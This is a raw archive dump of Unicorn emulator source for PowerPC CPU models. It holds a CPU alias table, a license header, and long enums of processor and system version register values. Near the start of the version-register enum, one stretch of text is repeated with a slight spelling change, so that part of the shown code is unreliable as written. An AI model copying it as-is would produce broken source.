CPU_POWERPC_POWER8NVL_v10, POWER8, "POWER8NVL v1.0") POWERPC_DEF("power9_v1.0", CPU_POWERPC_POWER9_DD1, POWER9, "POWER9 v1.0") POWERPC_DEF("power9_v2.0", CPU_POWERPC_POWER9_DD20, POWER9, "POWER9 v2.0") POWERPC_DEF("power10_v1.0", CPU_POWERPC_POWER10_DD1, POWER10, "POWER10 v1.0") #endif /* defined (TARGET_PPC64) */ /***************************************************************************/ /* PowerPC CPU aliases */ PowerPCCPUAlias ppc_cpu_aliases[] = { { 
"403", "403gc" }, { "405", "405d4" }, { "405cr", "405crc" }, { "405gp", "405gpd" }, { "405gpe", "405crc" }, { "x2vp7", "x2vp4" }, { "x2vp50", "x2vp20" }, { "440ep", "440epb" }, { "460ex", "460exb" }, #if defined(TODO_USER_ONLY) { "440gp", "440gpc" }, { "440gr", "440gra" }, { "440gx", "440gxf" }, { "rcpu", "mpc5xx" }, /* MPC5xx microcontrollers */ { "mgt560", "mpc5xx" }, { "mpc509", "mpc5xx" }, { "mpc533", "mpc5xx" }, { "mpc534", "mpc5xx" }, { "mpc555", "mpc5xx" }, { "mpc556", "mpc5xx" }, { "mpc560", "mpc5xx" }, { "mpc561", "mpc5xx" }, { "mpc562", "mpc5xx" }, { "mpc563", "mpc5xx" }, { "mpc564", "mpc5xx" }, { "mpc565", "mpc5xx" }, { "mpc566", "mpc5xx" }, { "powerquicc", "mpc8xx" }, /* MPC8xx microcontrollers */ { "mgt823", "mpc8xx" }, { "mpc821", "mpc8xx" }, { "mpc823", "mpc8xx" }, { "mpc850", "mpc8xx" }, { "mpc852t", "mpc8xx" }, { "mpc855t", "mpc8xx" }, { "mpc857", "mpc8xx" }, { "mpc859", "mpc8xx" }, { "mpc860", "mpc8xx" }, { "mpc862", "mpc8xx" }, { "mpc866", "mpc8xx" }, { "mpc870", "mpc8xx" }, { "mpc875", "mpc8xx" }, { "mpc880", "mpc8xx" }, { "mpc885", "mpc8xx" }, #endif /* PowerPC MPC603 microcontrollers */ { "mpc8240", "603" }, { "mpc52xx", "mpc5200_v12" }, { "mpc5200", "mpc5200_v12" }, { "mpc5200b", "mpc5200b_v21" }, { "mpc82xx", "g2legp3" }, { "powerquicc-ii", "g2legp3" }, { "mpc8241", "g2hip4" }, { "mpc8245", "g2hip4" }, { "mpc8247", "g2legp3" }, { "mpc8248", "g2legp3" }, { "mpc8250", "g2hip4" }, { "mpc8250_hip3", "g2hip3" }, { "mpc8250_hip4", "g2hip4" }, { "mpc8255", "g2hip4" }, { "mpc8255_hip3", "g2hip3" }, { "mpc8255_hip4", "g2hip4" }, { "mpc8260", "g2hip4" }, { "mpc8260_hip3", "g2hip3" }, { "mpc8260_hip4", "g2hip4" }, { "mpc8264", "g2hip4" }, { "mpc8264_hip3", "g2hip3" }, { "mpc8264_hip4", "g2hip4" }, { "mpc8265", "g2hip4" }, { "mpc8265_hip3", "g2hip3" }, { "mpc8265_hip4", "g2hip4" }, { "mpc8266", "g2hip4" }, { "mpc8266_hip3", "g2hip3" }, { "mpc8266_hip4", "g2hip4" }, { "mpc8270", "g2legp3" }, { "mpc8271", "g2legp3" }, { "mpc8272", "g2legp3" }, { "mpc8275", "g2legp3" }, { "mpc8280", "g2legp3" }, { "e200", "e200z6" }, { "e300", "e300c3" }, { "mpc8347", "mpc8347t" }, { "mpc8347a", "mpc8347at" }, { "mpc8347e", "mpc8347et" }, { "mpc8347ea", "mpc8347eat" }, { "e500", "e500v2_v22" }, { "e500v1", "e500_v20" }, { "e500v2", "e500v2_v22" }, { "mpc8533", "mpc8533_v11" }, { "mpc8533e", "mpc8533e_v11" }, { "mpc8540", "mpc8540_v21" }, { "mpc8541", "mpc8541_v11" }, { "mpc8541e", "mpc8541e_v11" }, { "mpc8543", "mpc8543_v21" }, { "mpc8543e", "mpc8543e_v21" }, { "mpc8544", "mpc8544_v11" }, { "mpc8544e", "mpc8544e_v11" }, { "mpc8545", "mpc8545_v21" }, { "mpc8545e", "mpc8545e_v21" }, { "mpc8547e", "mpc8547e_v21" }, { "mpc8548", "mpc8548_v21" }, { "mpc8548e", "mpc8548e_v21" }, { "mpc8555", "mpc8555_v11" }, { "mpc8555e", "mpc8555e_v11" }, { "mpc8560", "mpc8560_v21" }, { "601", "601_v2" }, { "601v", "601_v2" }, { "vanilla", "603" }, { "603e", "603e_v4.1" }, { "stretch", "603e_v4.1" }, { "vaillant", "603e7v" }, { "603r", "603e7t" }, { "goldeneye", "603e7t" }, { "604e", "604e_v2.4" }, { "sirocco", "604e_v2.4" }, { "mach5", "604r" }, { "740", "740_v3.1" }, { "arthur", "740_v3.1" }, { "750", "750_v3.1" }, { "typhoon", "750_v3.1" }, { "g3", "750_v3.1" }, { "conan/doyle", "750p" }, { "750cl", "750cl_v2.0" }, { "750cx", "750cx_v2.2" }, { "750cxe", "750cxe_v3.1b" }, { "750fx", "750fx_v2.3" }, { "750gx", "750gx_v1.2" }, { "750l", "750l_v3.2" }, { "lonestar", "750l_v3.2" }, { "745", "745_v2.8" }, { "755", "755_v2.8" }, { "goldfinger", "755_v2.8" }, { "7400", "7400_v2.9" }, { "max", "7400_v2.9" }, { "g4", 
"7400_v2.9" }, { "7410", "7410_v1.4" }, { "nitro", "7410_v1.4" }, { "7448", "7448_v2.1" }, { "7450", "7450_v2.1" }, { "vger", "7450_v2.1" }, { "7441", "7441_v2.3" }, { "7451", "7451_v2.3" }, { "7445", "7445_v3.2" }, { "7455", "7455_v3.2" }, { "apollo6", "7455_v3.2" }, { "7447", "7447_v1.1" }, { "7457", "7457_v1.2" }, { "apollo7", "7457_v1.2" }, { "7447a", "7447a_v1.2" }, { "7457a", "7457a_v1.2" }, { "apollo7pm", "7457a_v1.0" }, #if defined(TARGET_PPC64) { "970", "970_v2.2" }, { "970fx", "970fx_v3.1" }, { "970mp", "970mp_v1.1" }, { "power5+", "power5+_v2.1" }, { "power5gs", "power5+_v2.1" }, { "power7", "power7_v2.3" }, { "power7+", "power7+_v2.1" }, { "power8e", "power8e_v2.1" }, { "power8", "power8_v2.0" }, { "power8nvl", "power8nvl_v1.0" }, { "power9", "power9_v2.0" }, { "power10", "power10_v1.0" }, #endif /* Generic PowerPCs */ #if defined(TARGET_PPC64) { "ppc64", "970fx_v3.1" }, #endif { "ppc32", "604" }, { "ppc", "604" }, { "default", "604" }, { NULL, NULL } }; #endif �unicorn-2.1.1/qemu/target/ppc/cpu-models.h����������������������������������������������������������0000664�0000000�0000000�00000061031�14675241067�0020445�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC CPU initialization for qemu. * * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright 2011 Freescale Semiconductor, Inc. * Copyright 2013 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef TARGET_PPC_CPU_MODELS_H #define TARGET_PPC_CPU_MODELS_H /** * PowerPCCPUAlias: * @alias: The alias name. * @model: The CPU model @alias refers to, that directly resolves into CPU type * * A mapping entry from CPU @alias to CPU @model. */ typedef struct PowerPCCPUAlias { const char *alias; const char *model; } PowerPCCPUAlias; extern PowerPCCPUAlias ppc_cpu_aliases[]; /*****************************************************************************/ /* PVR definitions for most known PowerPC */ enum { /* PowerPC 401 family */ /* Generic PowerPC 401 */ #define CPU_POWERPC_401 CPU_POWERPC_401G2 /* PowerPC 401 cores */ CPU_POWERPC_401A1 = 0x00210000, CPU_POWERPC_401B2 = 0x00220000, CPU_POWERPC_401C2 = 0x00230000, CPU_POWERPC_401D2 = 0x00240000, CPU_POWERPC_401E2 = 0x00250000, CPU_POWERPC_401F2 = 0x00260000, CPU_POWERPC_401G2 = 0x00270000, /* PowerPC 401 microcontrolers */ #define CPU_POWERPC_IOP480 CPU_POWERPC_401B2 /* IBM Processor for Network Resources */ CPU_POWERPC_COBRA = 0x10100000, /* XXX: 405 ? 
/*****************************************************************************/ /* PVR definitions for most known PowerPC */ enum { /* PowerPC 401 family */ /* Generic PowerPC 401 */ #define CPU_POWERPC_401 CPU_POWERPC_401G2 /* PowerPC 401 cores */ CPU_POWERPC_401A1 = 0x00210000, CPU_POWERPC_401B2 = 0x00220000, CPU_POWERPC_401C2 = 0x00230000, CPU_POWERPC_401D2 = 0x00240000, CPU_POWERPC_401E2 = 0x00250000, CPU_POWERPC_401F2 = 0x00260000, CPU_POWERPC_401G2 = 0x00270000, /* PowerPC 401 microcontrollers */ #define CPU_POWERPC_IOP480 CPU_POWERPC_401B2 /* IBM Processor for Network Resources */ CPU_POWERPC_COBRA = 0x10100000, /* XXX: 405 ? */ /* PowerPC 403 family */ /* PowerPC 403 microcontrollers */ CPU_POWERPC_403GA = 0x00200011, CPU_POWERPC_403GB = 0x00200100, CPU_POWERPC_403GC = 0x00200200, CPU_POWERPC_403GCX = 0x00201400, /* PowerPC 405 family */ /* PowerPC 405 cores */ CPU_POWERPC_405D2 = 0x20010000, CPU_POWERPC_405D4 = 0x41810000, /* PowerPC 405 microcontrollers */ /* XXX: missing 0x200108a0 */ CPU_POWERPC_405CRa = 0x40110041, CPU_POWERPC_405CRb = 0x401100C5, CPU_POWERPC_405CRc = 0x40110145, CPU_POWERPC_405EP = 0x51210950, CPU_POWERPC_405EZ = 0x41511460, /* 0x51210950 ? */ CPU_POWERPC_405GPa = 0x40110000, CPU_POWERPC_405GPb = 0x40110040, CPU_POWERPC_405GPc = 0x40110082, CPU_POWERPC_405GPd = 0x401100C4, CPU_POWERPC_405GPR = 0x50910951, CPU_POWERPC_405LP = 0x41F10000, /* IBM network processors */ CPU_POWERPC_NPE405H = 0x414100C0, CPU_POWERPC_NPE405H2 = 0x41410140, CPU_POWERPC_NPE405L = 0x416100C0, CPU_POWERPC_NPE4GS3 = 0x40B10000, /* IBM STBxxx (PowerPC 401/403/405 core based microcontrollers) */ CPU_POWERPC_STB03 = 0x40310000, /* 0x40130000 ? */ CPU_POWERPC_STB04 = 0x41810000, CPU_POWERPC_STB25 = 0x51510950, /* Xilinx cores */ CPU_POWERPC_X2VP4 = 0x20010820, CPU_POWERPC_X2VP20 = 0x20010860, /* PowerPC 440 family */ /* Generic PowerPC 440 */ #define CPU_POWERPC_440 CPU_POWERPC_440GXf /* PowerPC 440 cores */ CPU_POWERPC_440_XILINX = 0x7ff21910, /* PowerPC 440 microcontrollers */ CPU_POWERPC_440EPa = 0x42221850, CPU_POWERPC_440EPb = 0x422218D3, CPU_POWERPC_440GPb = 0x40120440, CPU_POWERPC_440GPc = 0x40120481, #define CPU_POWERPC_440GRa CPU_POWERPC_440EPb CPU_POWERPC_440GRX = 0x200008D0, #define CPU_POWERPC_440EPX CPU_POWERPC_440GRX CPU_POWERPC_440GXa = 0x51B21850, CPU_POWERPC_440GXb = 0x51B21851, CPU_POWERPC_440GXc = 0x51B21892, CPU_POWERPC_440GXf = 0x51B21894, CPU_POWERPC_440SP = 0x53221850, CPU_POWERPC_440SP2 = 0x53221891, CPU_POWERPC_440SPE = 0x53421890, CPU_POWERPC_460EXb = 0x130218A4, /* called 460 but 440 core */ /* Freescale embedded PowerPC cores */ /* PowerPC MPC 5xx cores (aka RCPU) */ CPU_POWERPC_MPC5xx = 0x00020020, /* PowerPC MPC 8xx cores (aka PowerQUICC) */ CPU_POWERPC_MPC8xx = 0x00500000, /* G2 cores (aka PowerQUICC-II) */ CPU_POWERPC_G2 = 0x00810011, CPU_POWERPC_G2H4 = 0x80811010, CPU_POWERPC_G2gp = 0x80821010, CPU_POWERPC_G2ls = 0x90810010, CPU_POWERPC_MPC603 = 0x00810100, CPU_POWERPC_G2_HIP3 = 0x00810101, CPU_POWERPC_G2_HIP4 = 0x80811014, /* G2_LE core (aka PowerQUICC-II) */ CPU_POWERPC_G2LE = 0x80820010, CPU_POWERPC_G2LEgp = 0x80822010, CPU_POWERPC_G2LEls = 0xA0822010, CPU_POWERPC_G2LEgp1 = 0x80822011, CPU_POWERPC_G2LEgp3 = 0x80822013, /* MPC52xx microcontrollers */ /* XXX: MPC 5121 ?
*/ #define CPU_POWERPC_MPC5200_v10 CPU_POWERPC_G2LEgp1 #define CPU_POWERPC_MPC5200_v11 CPU_POWERPC_G2LEgp1 #define CPU_POWERPC_MPC5200_v12 CPU_POWERPC_G2LEgp1 #define CPU_POWERPC_MPC5200B_v20 CPU_POWERPC_G2LEgp1 #define CPU_POWERPC_MPC5200B_v21 CPU_POWERPC_G2LEgp1 /* e200 family */ /* e200 cores */ CPU_POWERPC_e200z5 = 0x81000000, CPU_POWERPC_e200z6 = 0x81120000, /* e300 family */ /* e300 cores */ CPU_POWERPC_e300c1 = 0x00830010, CPU_POWERPC_e300c2 = 0x00840010, CPU_POWERPC_e300c3 = 0x00850010, CPU_POWERPC_e300c4 = 0x00860010, /* MPC83xx microcontrollers */ #define CPU_POWERPC_MPC834x CPU_POWERPC_e300c1 #define CPU_POWERPC_MPC837x CPU_POWERPC_e300c4 /* e500 family */ /* e500 cores */ #define CPU_POWERPC_e500 CPU_POWERPC_e500v2_v22 CPU_POWERPC_e500v1_v10 = 0x80200010, CPU_POWERPC_e500v1_v20 = 0x80200020, CPU_POWERPC_e500v2_v10 = 0x80210010, CPU_POWERPC_e500v2_v11 = 0x80210011, CPU_POWERPC_e500v2_v20 = 0x80210020, CPU_POWERPC_e500v2_v21 = 0x80210021, CPU_POWERPC_e500v2_v22 = 0x80210022, CPU_POWERPC_e500v2_v30 = 0x80210030, CPU_POWERPC_e500mc = 0x80230020, CPU_POWERPC_e5500 = 0x80240020, CPU_POWERPC_e6500 = 0x80400020, /* MPC85xx microcontrollers */ #define CPU_POWERPC_MPC8533_v10 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8533_v11 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8533E_v10 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8533E_v11 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8540_v10 CPU_POWERPC_e500v1_v10 #define CPU_POWERPC_MPC8540_v20 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8540_v21 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8541_v10 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8541_v11 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8541E_v10 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8541E_v11 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8543_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8543_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8543_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8543_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8543E_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8543E_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8543E_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8543E_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8544_v10 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8544_v11 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8544E_v11 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8544E_v10 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8545_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8545_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8545_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8545E_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8545E_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8545E_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8547E_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8547E_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8547E_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8548_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8548_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8548_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8548_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8548E_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8548E_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8548E_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8548E_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8555_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8555_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8555E_v10 CPU_POWERPC_e500v2_v10 
#define CPU_POWERPC_MPC8555E_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8560_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8560_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8560_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8567 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8567E CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8568 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8568E CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8572 CPU_POWERPC_e500v2_v30 #define CPU_POWERPC_MPC8572E CPU_POWERPC_e500v2_v30 /* e600 family */ /* e600 cores */ CPU_POWERPC_e600 = 0x80040010, /* MPC86xx microcontrollers */ #define CPU_POWERPC_MPC8610 CPU_POWERPC_e600 #define CPU_POWERPC_MPC8641 CPU_POWERPC_e600 #define CPU_POWERPC_MPC8641D CPU_POWERPC_e600 /* PowerPC 6xx cores */ CPU_POWERPC_601_v0 = 0x00010001, CPU_POWERPC_601_v1 = 0x00010001, CPU_POWERPC_601_v2 = 0x00010002, CPU_POWERPC_602 = 0x00050100, CPU_POWERPC_603 = 0x00030100, CPU_POWERPC_603E_v11 = 0x00060101, CPU_POWERPC_603E_v12 = 0x00060102, CPU_POWERPC_603E_v13 = 0x00060103, CPU_POWERPC_603E_v14 = 0x00060104, CPU_POWERPC_603E_v22 = 0x00060202, CPU_POWERPC_603E_v3 = 0x00060300, CPU_POWERPC_603E_v4 = 0x00060400, CPU_POWERPC_603E_v41 = 0x00060401, CPU_POWERPC_603E7t = 0x00071201, CPU_POWERPC_603E7v = 0x00070100, CPU_POWERPC_603E7v1 = 0x00070101, CPU_POWERPC_603E7v2 = 0x00070201, CPU_POWERPC_603E7 = 0x00070200, CPU_POWERPC_603P = 0x00070000, /* XXX: missing 0x00040303 (604) */ CPU_POWERPC_604 = 0x00040103, /* XXX: missing 0x00091203 */ /* XXX: missing 0x00092110 */ /* XXX: missing 0x00092120 */ CPU_POWERPC_604E_v10 = 0x00090100, CPU_POWERPC_604E_v22 = 0x00090202, CPU_POWERPC_604E_v24 = 0x00090204, /* XXX: missing 0x000a0100 */ /* XXX: missing 0x00093102 */ CPU_POWERPC_604R = 0x000a0101, /* PowerPC 740/750 cores (aka G3) */ /* XXX: missing 0x00084202 */ CPU_POWERPC_7x0_v10 = 0x00080100, CPU_POWERPC_7x0_v20 = 0x00080200, CPU_POWERPC_7x0_v21 = 0x00080201, CPU_POWERPC_7x0_v22 = 0x00080202, CPU_POWERPC_7x0_v30 = 0x00080300, CPU_POWERPC_7x0_v31 = 0x00080301, CPU_POWERPC_740E = 0x00080100, CPU_POWERPC_750E = 0x00080200, CPU_POWERPC_7x0P = 0x10080000, /* XXX: missing 0x00087010 (CL ?) 
*/ CPU_POWERPC_750CL_v10 = 0x00087200, CPU_POWERPC_750CL_v20 = 0x00087210, /* aka rev E */ CPU_POWERPC_750CX_v10 = 0x00082100, CPU_POWERPC_750CX_v20 = 0x00082200, CPU_POWERPC_750CX_v21 = 0x00082201, CPU_POWERPC_750CX_v22 = 0x00082202, CPU_POWERPC_750CXE_v21 = 0x00082211, CPU_POWERPC_750CXE_v22 = 0x00082212, CPU_POWERPC_750CXE_v23 = 0x00082213, CPU_POWERPC_750CXE_v24 = 0x00082214, CPU_POWERPC_750CXE_v24b = 0x00083214, CPU_POWERPC_750CXE_v30 = 0x00082310, CPU_POWERPC_750CXE_v31 = 0x00082311, CPU_POWERPC_750CXE_v31b = 0x00083311, CPU_POWERPC_750CXR = 0x00083410, CPU_POWERPC_750FL = 0x70000203, CPU_POWERPC_750FX_v10 = 0x70000100, CPU_POWERPC_750FX_v20 = 0x70000200, CPU_POWERPC_750FX_v21 = 0x70000201, CPU_POWERPC_750FX_v22 = 0x70000202, CPU_POWERPC_750FX_v23 = 0x70000203, CPU_POWERPC_750GL = 0x70020102, CPU_POWERPC_750GX_v10 = 0x70020100, CPU_POWERPC_750GX_v11 = 0x70020101, CPU_POWERPC_750GX_v12 = 0x70020102, CPU_POWERPC_750L_v20 = 0x00088200, CPU_POWERPC_750L_v21 = 0x00088201, CPU_POWERPC_750L_v22 = 0x00088202, CPU_POWERPC_750L_v30 = 0x00088300, CPU_POWERPC_750L_v32 = 0x00088302, /* PowerPC 745/755 cores */ CPU_POWERPC_7x5_v10 = 0x00083100, CPU_POWERPC_7x5_v11 = 0x00083101, CPU_POWERPC_7x5_v20 = 0x00083200, CPU_POWERPC_7x5_v21 = 0x00083201, CPU_POWERPC_7x5_v22 = 0x00083202, /* aka D */ CPU_POWERPC_7x5_v23 = 0x00083203, /* aka E */ CPU_POWERPC_7x5_v24 = 0x00083204, CPU_POWERPC_7x5_v25 = 0x00083205, CPU_POWERPC_7x5_v26 = 0x00083206, CPU_POWERPC_7x5_v27 = 0x00083207, CPU_POWERPC_7x5_v28 = 0x00083208, /* PowerPC 74xx cores (aka G4) */ /* XXX: missing 0x000C1101 */ CPU_POWERPC_7400_v10 = 0x000C0100, CPU_POWERPC_7400_v11 = 0x000C0101, CPU_POWERPC_7400_v20 = 0x000C0200, CPU_POWERPC_7400_v21 = 0x000C0201, CPU_POWERPC_7400_v22 = 0x000C0202, CPU_POWERPC_7400_v26 = 0x000C0206, CPU_POWERPC_7400_v27 = 0x000C0207, CPU_POWERPC_7400_v28 = 0x000C0208, CPU_POWERPC_7400_v29 = 0x000C0209, CPU_POWERPC_7410_v10 = 0x800C1100, CPU_POWERPC_7410_v11 = 0x800C1101, CPU_POWERPC_7410_v12 = 0x800C1102, /* aka C */ CPU_POWERPC_7410_v13 = 0x800C1103, /* aka D */ CPU_POWERPC_7410_v14 = 0x800C1104, /* aka E */ CPU_POWERPC_7448_v10 = 0x80040100, CPU_POWERPC_7448_v11 = 0x80040101, CPU_POWERPC_7448_v20 = 0x80040200, CPU_POWERPC_7448_v21 = 0x80040201, CPU_POWERPC_7450_v10 = 0x80000100, CPU_POWERPC_7450_v11 = 0x80000101, CPU_POWERPC_7450_v12 = 0x80000102, CPU_POWERPC_7450_v20 = 0x80000200, /* aka A, B, C, D: 2.04 */ CPU_POWERPC_7450_v21 = 0x80000201, /* aka E */ CPU_POWERPC_74x1_v23 = 0x80000203, /* aka G: 2.3 */ /* XXX: this entry might be a bug in some documentation */ CPU_POWERPC_74x1_v210 = 0x80000210, /* aka G: 2.3 ? 
*/ CPU_POWERPC_74x5_v10 = 0x80010100, /* XXX: missing 0x80010200 */ CPU_POWERPC_74x5_v21 = 0x80010201, /* aka C: 2.1 */ CPU_POWERPC_74x5_v32 = 0x80010302, CPU_POWERPC_74x5_v33 = 0x80010303, /* aka F: 3.3 */ CPU_POWERPC_74x5_v34 = 0x80010304, /* aka G: 3.4 */ CPU_POWERPC_74x7_v10 = 0x80020100, /* aka A: 1.0 */ CPU_POWERPC_74x7_v11 = 0x80020101, /* aka B: 1.1 */ CPU_POWERPC_74x7_v12 = 0x80020102, /* aka C: 1.2 */ CPU_POWERPC_74x7A_v10 = 0x80030100, /* aka A: 1.0 */ CPU_POWERPC_74x7A_v11 = 0x80030101, /* aka B: 1.1 */ CPU_POWERPC_74x7A_v12 = 0x80030102, /* aka C: 1.2 */ /* 64 bits PowerPC */ #if defined(TARGET_PPC64) CPU_POWERPC_620 = 0x00140000, CPU_POWERPC_630 = 0x00400000, CPU_POWERPC_631 = 0x00410104, CPU_POWERPC_POWER4 = 0x00350000, CPU_POWERPC_POWER4P = 0x00380000, /* XXX: missing 0x003A0201 */ CPU_POWERPC_POWER5 = 0x003A0203, CPU_POWERPC_POWER5P_v21 = 0x003B0201, CPU_POWERPC_POWER6 = 0x003E0000, CPU_POWERPC_POWER_SERVER_MASK = 0xFFFF0000, CPU_POWERPC_POWER7_BASE = 0x003F0000, CPU_POWERPC_POWER7_v23 = 0x003F0203, CPU_POWERPC_POWER7P_BASE = 0x004A0000, CPU_POWERPC_POWER7P_v21 = 0x004A0201, CPU_POWERPC_POWER8E_BASE = 0x004B0000, CPU_POWERPC_POWER8E_v21 = 0x004B0201, CPU_POWERPC_POWER8_BASE = 0x004D0000, CPU_POWERPC_POWER8_v20 = 0x004D0200, CPU_POWERPC_POWER8NVL_BASE = 0x004C0000, CPU_POWERPC_POWER8NVL_v10 = 0x004C0100, CPU_POWERPC_POWER9_BASE = 0x004E0000, CPU_POWERPC_POWER9_DD1 = 0x004E0100, CPU_POWERPC_POWER9_DD20 = 0x004E1200, CPU_POWERPC_POWER10_BASE = 0x00800000, CPU_POWERPC_POWER10_DD1 = 0x00800100, CPU_POWERPC_970_v22 = 0x00390202, CPU_POWERPC_970FX_v10 = 0x00391100, CPU_POWERPC_970FX_v20 = 0x003C0200, CPU_POWERPC_970FX_v21 = 0x003C0201, CPU_POWERPC_970FX_v30 = 0x003C0300, CPU_POWERPC_970FX_v31 = 0x003C0301, CPU_POWERPC_970MP_v10 = 0x00440100, CPU_POWERPC_970MP_v11 = 0x00440101, #define CPU_POWERPC_CELL CPU_POWERPC_CELL_v32 CPU_POWERPC_CELL_v10 = 0x00700100, CPU_POWERPC_CELL_v20 = 0x00700400, CPU_POWERPC_CELL_v30 = 0x00700500, CPU_POWERPC_CELL_v31 = 0x00700501, #define CPU_POWERPC_CELL_v32 CPU_POWERPC_CELL_v31 CPU_POWERPC_RS64 = 0x00330000, CPU_POWERPC_RS64II = 0x00340000, CPU_POWERPC_RS64III = 0x00360000, CPU_POWERPC_RS64IV = 0x00370000, #endif /* defined(TARGET_PPC64) */ /* Original POWER */ /* * XXX: should be POWER (RIOS), RSC3308, RSC4608, * POWER2 (RIOS2) & RSC2 (P2SC) here */ /* PA Semi core */ CPU_POWERPC_PA6T = 0x00900000, }; /* Logical PVR definitions for sPAPR */ enum { CPU_POWERPC_LOGICAL_2_04 = 0x0F000001, CPU_POWERPC_LOGICAL_2_05 = 0x0F000002, CPU_POWERPC_LOGICAL_2_06 = 0x0F000003, CPU_POWERPC_LOGICAL_2_06_PLUS = 0x0F100003, CPU_POWERPC_LOGICAL_2_07 = 0x0F000004, CPU_POWERPC_LOGICAL_3_00 = 0x0F000005, CPU_POWERPC_LOGICAL_3_10 = 0x0F000006, }; /* System version register (used on MPC 8xxx) */ enum { POWERPC_SVR_NONE = 0x00000000, POWERPC_SVR_5200_v10 = 0x80110010, POWERPC_SVR_5200_v11 = 0x80110011, POWERPC_SVR_5200_v12 = 0x80110012, POWERPC_SVR_5200B_v20 = 0x80110020, POWERPC_SVR_5200B_v21 = 0x80110021, #define POWERPC_SVR_55xx POWERPC_SVR_5567 POWERPC_SVR_8343 = 0x80570010, POWERPC_SVR_8343A = 0x80570030, POWERPC_SVR_8343E = 0x80560010, POWERPC_SVR_8343EA = 0x80560030, POWERPC_SVR_8347P = 0x80550010, /* PBGA package */ POWERPC_SVR_8347T = 0x80530010, /* TBGA package */ POWERPC_SVR_8347AP = 0x80550030, /* PBGA package */ POWERPC_SVR_8347AT = 0x80530030, /* TBGA package */ POWERPC_SVR_8347EP = 0x80540010, /* PBGA package */ POWERPC_SVR_8347ET = 0x80520010, /* TBGA package */ POWERPC_SVR_8347EAP = 0x80540030, /* PBGA package */ POWERPC_SVR_8347EAT = 0x80520030, /* TBGA 
package */ POWERPC_SVR_8349 = 0x80510010, POWERPC_SVR_8349A = 0x80510030, POWERPC_SVR_8349E = 0x80500010, POWERPC_SVR_8349EA = 0x80500030, #define POWERPC_SVR_E500 0x40000000 POWERPC_SVR_8377 = 0x80C70010 | POWERPC_SVR_E500, POWERPC_SVR_8377E = 0x80C60010 | POWERPC_SVR_E500, POWERPC_SVR_8378 = 0x80C50010 | POWERPC_SVR_E500, POWERPC_SVR_8378E = 0x80C40010 | POWERPC_SVR_E500, POWERPC_SVR_8379 = 0x80C30010 | POWERPC_SVR_E500, POWERPC_SVR_8379E = 0x80C00010 | POWERPC_SVR_E500, POWERPC_SVR_8533_v10 = 0x80340010 | POWERPC_SVR_E500, POWERPC_SVR_8533_v11 = 0x80340011 | POWERPC_SVR_E500, POWERPC_SVR_8533E_v10 = 0x803C0010 | POWERPC_SVR_E500, POWERPC_SVR_8533E_v11 = 0x803C0011 | POWERPC_SVR_E500, POWERPC_SVR_8540_v10 = 0x80300010 | 